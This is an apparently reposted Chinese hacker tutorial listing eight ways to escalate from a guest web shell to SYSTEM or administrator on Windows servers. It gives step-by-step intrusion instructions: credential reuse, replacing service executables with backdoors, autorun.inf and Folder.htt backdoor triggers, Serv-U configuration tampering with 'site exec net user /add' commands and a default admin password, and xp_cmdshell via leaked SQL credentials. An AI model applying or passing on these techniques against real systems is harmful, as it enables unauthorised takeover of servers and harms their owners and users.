入侵权限提升方法总结

权限提升方法总结

来自台湾的[ZUSO]团队...所以就都是繁体字,请原谅哦...(绝对的好文章)

現在的入侵是越來越難了，人們的安全意識都普遍提高了不少，連個人使用者都懂得防火牆，殺毒軟體要裝備在手，對於微軟的補丁升級也不再是不加問津。因此現在我們想在因特網上掃瞄弱口令的主電腦已經幾乎是癡心妄想了。（這可是一件大大的好事啊。）

但是這也使得我們作駭客的進行入侵偵測達到了一個前所未有的難度。通過各種手段，我們通常並不能直接獲得一個系統的管理員權限。比如我們通過某些對IIS的攻擊，只能獲得IUSR-MACHINENAME的權限（如上傳asp木馬，以及某些溢出等）。這個帳號通常可是系統預設的guest權限，於是，如何拿到系統管理員或是是system權限，便顯得日益重要了。

於是，我就總結了一下大家所經常使用的幾種提升權限的方法，以下內容是我整理的，沒有什麼新的方法，寫給和我一樣的菜鳥看的。高手們就可以略去了，當然，你要複習我不反對，順便幫我查查有什麼補充與修改：

1、社會工程學。

對於社會工程學，我想大家一定不會陌生吧？（如果你還不太明白這個名詞的話，建議你去找一些相關資料查檢視。）我們通常是通過各種辦法獲得目的的敏感訊息，然後加以分析，從而可以推斷出對方admin的密碼。舉一個例子：假如我們是通過對伺服器進行資料庫猜解從而得到admin在網站上的密碼，然後借此上傳了一個海洋頂端木馬，你會怎麼做？先翻箱倒櫃察看asp檔案的程式碼以希望察看到連接SQL的帳號密碼？錯錯錯，我們應該先鍵入一個netstat –an指令察看他開的埠（當然用net start指令察看服務也行）。一旦發略F3389，猶豫什麼？馬上拿出你的終端設備連接器，添上對方IP，鍵入你在他網站上所獲得的使用者名稱及密碼……幾秒之後，呵呵，進去了吧？這是因為根據社會工程學的原理，通常人們為了記憶方便，將自己在多處的使用者名稱與密碼都是用同樣的。於是，我們獲得了他在網站上的管理員密碼，也就等同於獲得了他所有的密碼。其中就內含系統admin密碼。於是我們就可以借此登入他的3389拉！

即使他並沒有開啟3389服務，我們也可以憑借這個密碼到他的FTP伺服器上試試，如果他的FTP伺服器是serv-u 5.004 以下版本，而帳號又具有寫權限，那麼我們就可以進行溢出攻擊了！這可是可以直接拿到system權限的哦！（利用serv-u還有兩個提升權限的方法，
我待會兒會說的）

實在不行，我們也可以拿它的帳號去各大網站試試！或許就能進入他所申請的信箱拿到不少有用的訊息！可以用來配合我們以後的行動。

還有一種思路，我們知道，一個網站的網管通常會將自己的主頁設為IE開啟舊檔後的預設主頁，以便於管理。我們就可以利用這一點，將他自己的主頁植上網頁木馬……然後等他開啟舊檔IE……呵呵，他怎麼也不會想到自己的主頁會給自己種上木馬吧？
其實利用社會工程學有很多種方法，想作為一個合格駭客，這可是必學的哦！多動動你自己的腦子，你才會成功！

2、近端溢出。

微軟實在是太可愛了，這句話也不知是哪位仁兄說的，真是不假，時不時地就會給我們送來一些溢出漏洞，相信通過最近的MS-0011大家一定又賺了一把代理伺服器吧？其實我們在拿到了Guest權限的shell後同樣可以用溢出提升權限。最常用的就是RunAs.exe、 winwmiex.exe 或是PipeUpAdmin等等。上傳執行後就可以得到Admin權限。但一定是對方沒有打過補丁的情況下才行，不過最近微軟的漏洞一個接一個，近端提升權限的exploit也會出來的，所以大家要多多關心漏洞訊息，或許下一個exploit就是你寫出來的哦！

3、利用scripts目錄的可執行權限。

這也是我們以前得到webshell後經常使用的一招，原理是Scripts目錄是IIS下的可執行目錄，權限就是我們夢寐以求的SYSTEM權限。常見的使用方法就是在U漏洞時代我們先上傳idq.dll到IIS主目錄下的Scripts目錄，然後用ispc.exe進行連接，就可以拿到system權限，不過這個是在Microsoft出了SP3之後就行不通了，其實我們仍可以利用此目錄，只要我們上傳別的木馬到此目錄，我舉個例子就比如是winshell好了。然後我們在IE中輸入：

http://targetIP/Scripts/木馬檔名.exe

等一會，看到下面進度條顯示「完成」時，可以了，連接你設定的埠吧！我這裡是預設的5277，連接好後就是SYSTEM權限了！這時你要幹什麼我就管不著了……嘿嘿

4、取代系統服務。

這可是廣西大學黑友樂此不疲的一招。因為windows容許對正在執行中的程式進行改動，所以我們就可以取代他的服務以使得系統在重啟後自動執行我們的後門或是木馬！首先，通過你獲得的guest權限的shell輸入：net start指令，察看他所執行的服務。此時如果你對windows的系統服務熟悉的話，可以很快看出哪些服務我們可以利用。

C:/WINNT/System32/>net start
已經啟動以下 Windows 服務:

COM+ Event System
Cryptographic Services
DHCP Client
Distributed Link Tracking Client
DNS Client
Event Log
Help and Support
IPSEC Services
Logical Disk Manager
Logical Disk Manager Administrative Servic
Network Connections
Network Location Awareness (NLA)
Protected Storage
Remote Procedure Call (RPC)
Rising Process Communication Center
Rising Realtime Monitor Service
Secondary Logon
Security Accounts Manager
Shell Hardware Detection
System Event Notification
System Restore Service
Telephony
Themes
Upload Manager
WebClient
Windows Audio
Windows Image Acquisition (WIA)
Windows Management Instrumentation
Windows Time
Wireless Zero Configuration
Workstation

指令成功完成。

我先在我的機器上執行一下指令做個示範（大家別黑我呀），注意我用紅色標注的部分，那是我安裝的瑞星。Rising Process Communication Center服務所呼叫的是CCenter.exe，而Rising Realtime Monitor Service服務呼叫的是RavMonD.exe。這些都是其它廠商服務，可以利用。（強烈建議選項取代其它廠商服務，而不要亂動系統服務，否則會造成系統不穩定）於是我們查詢這兩個檔案，發現他們在D:/ rising/rav/資料夾中，此時注意一點：如果此檔是在系統盤的Program Files目錄中時，我們要知道，如果對方是使用的NTFS格式的硬碟，那麼系統盤下的這個檔案夾guest權限是預設不可寫的，還有Windows目錄、Documents and Settings目錄這些都是不可寫的，所以我們就不能取代檔案，只能令謀途徑了。（這也是為什麼我不建議取代系統服務的原因之一，因為系統服務檔案都在Windows/System32目錄中，不可寫）但如果是FAT32格式就不用擔心，由於它的先天不足，所有資料夾都是可寫的。

於是就有人會問：如果是NTFS格式難道我們就沒轍了嗎？

當然不是，NTFS格式預設情況下除了對那三個資料夾有限制外，其餘的檔案夾、分區都是everyone完全控制。（也就是說我即使是IPC$的匿名連接，都會對這些地方有可寫可執行權限！）所以一旦對方的其它廠商服務不是安裝在那三個資料夾中，我們就可以取代了！我就拿CCenter下手，先將它下載到近端機器上（FTP、放到IIS主目錄中再下載等等……）然後拿出你的檔案捆綁機，找到一個你最拿手的後門……呵呵，捆綁好後，上傳，先將對方的CCenter.exe檔案改個名CCENTBAK.exe，然後取代成自己的CCenter。現在只需要等對方的機器重啟，我們的後門就可以執行了！由於Windows系統的不穩定，主電腦在一個禮拜後就會重啟，（當然如果你等不及的話，可以對此伺服器進行DDOS攻擊迫使他重啟，但我並不贊同！）此時登上你的後門，就是System權限了！

5、取代admin常用程式。

如果對方沒有你所能利用的服務，也可以取代對方管理員常用的程式，例如QQ，MSN等等，具體取代方法與取代服務一樣，只是你的後門什麼時候可以啟動就得看你的運氣了。

6、利用autorun .inf或desktop.ini。

我們常會碰到這種事：光碟放進光碟機，就會自動跳出來一段FLASH，這是為什麼？呵呵，你到光碟的根目錄中看看，是否有一個autorun.inf的檔案？用記事本開啟舊檔來看看，是不是有這麼一句話：autorun=xxx.exe 這就是你剛才所看到的自動執行的程式了。

於是我們就可以利用這個來提升我們的權限。先組態好一個後門，（我常用的是winshell，當然你不用這個也行）上傳到他D盤下的任意一個檔案夾中，然後從你那個自執行的光碟中把autorun.inf檔案也上傳，不過上傳前先將autorun=xxx.exe 後面的xxx.exe改為你組態的後門檔案途徑、檔名，然後再上傳到d盤根目錄下，加上唯讀、系統、隱藏內容。OK就等對方admin瀏覽D盤，我們的後門就可以啟動了！（當然，這必須是在他沒有禁止自動執行的情況下才行。）

另外有相同作用的是desktop.ini。大家都知道windows支援自訂檔案，其實它就是通過在資料夾中寫入特定檔案——desktop.ini與Folder.htt來實現的，我們就可以利用修改這檔案來達到我們的目的。

首先，我們現在近端建立一個檔案夾，名字不重要，進入它，在空白處點右鍵，選擇「自訂資料夾」（xp好像是不行的）一直下點，預設即可。完成後，你就會看到在此目錄下多了兩個名為Folder setting的檔案架與desktop.ini的檔案，（如果你看不到，先取消「隱藏受保護的作業系統檔案」）然後我們在Folder setting目錄下找到Folder.htt檔案，記事本開啟舊檔，在任意地方加入以下程式碼：

<OBJECT ID=」RUNIT」 WIDTH=0 HEIGHT=0 TYPE=」application/x-oleobject」 CODEBASE=」你的後門檔名」>
</OBJECT>

然後你將你的後門檔案放在Folder setting目錄下，把此目錄與desktop.ini一起上傳到對方任意一個目錄下，就可以了，只要等管理員瀏覽了此目錄，它就執行了我們的後門！（如果你不放心，可以多設定幾個目錄）

7、Serv-U提升權限

利用Serv-U提升權限共有三種方法，溢出是第一種，我之前已經說過，這裡就不介紹了。我要講的是其餘兩種辦法。

辦法一：要求：對Serv-u安裝目錄有完全控制權。

方法：進入對方的Serv-U目錄，察看他的ServUDaemon.ini，這是Serv-U的組態檔案，如果管理員沒有選擇將serv- u的所有組態寫入系統登錄表的話，我們就可以從這個檔案中看到Serv-U的所有訊息，版本、IP、甚至使用者名稱與密碼！早些版本的密碼是不加密的，但是後來是經過了MD5加密。所以不能直接得到其密碼。不過我們仍然有辦法：先在近端安裝一個Serv-U（版本最好新點），將你自己的ServUDaemon.ini檔案用從他那下載下來的ServUDaemon.ini 覆寫掉，重起一下Serv-U，於是你上面的所有組態都與他的一模一樣了。我們開新檔案一個使用者，什麼群組不重要，重要的是將他的主目錄改為對方的系統盤，然後加上執行權限！這個最重要。變更完後套用，離開。再將你變更過的ServUDaemon.ini 檔案上傳，覆寫掉他的檔案，然後就等他的Serv-U重啟OLE組態，之後我們就可以登入他的FTP。進入後執行以下指令：

Cd windows
Cd System32
Quote site exec net.exe user wofeiwo /add
Quote site exec net.exe localgroup administrators wofeiwo /add
Bye

然後你就有了一個叫wofeiwo的系統管理員了，還等什麼?登陸3389，大功告成！

辦法二：Serv-u開了兩個埠，一個是21，也就是ＦＴＰ了，而另一個是43958，這個埠是幹什麼的？嘿嘿，這個是Ｓｅｒｖ－Ｕ的近端管理埠。但是預設是不准除了１２７．０．０．１外的ｉｐ連接的，此時就要用到FPIPE.exe檔案，這是一個埠轉信程式，上傳他，執行指令：

Fpipe –v –l 3333 –r 43958 127.0.0.1

意思是將4444埠映射到43958埠上。

然後就可以在近端安裝一個Serv-u，開新檔案一個伺服器，IP填對方IP，帳號為LocalAdministrator 密碼為#1@$ak#.1k;0@p 連線上後你就可以管理他的Serv-u了，之後提升權限的方法參考辦法一。我就不贅述了。

8、SQL帳戶密碼洩露。

如果對方開了MSSQL伺服器，我們就可以通過用SQL連接器加管理員帳號，因為MSSQL是預設的SYSTEM權限。
要求：你得到了對方MSSQL管理員密碼（可以從他的連接資料庫的ASP檔案中看到）,對方沒有刪除xp_cmdshell
方法：使用Sqlexec.exe，在host 一欄中填入對方IP，User與Pass中填入你所得到的使用者名稱與密碼。Format選擇xp_cmdshell」%s」即可。然後點選connect，連線上後就可以在CMD一欄中輸入你想要的CMD指令了。

總之，以上的8種方法並不是絕對的，最主要的是你的思路，每種方法互相結合，才能發揮其應有的效應。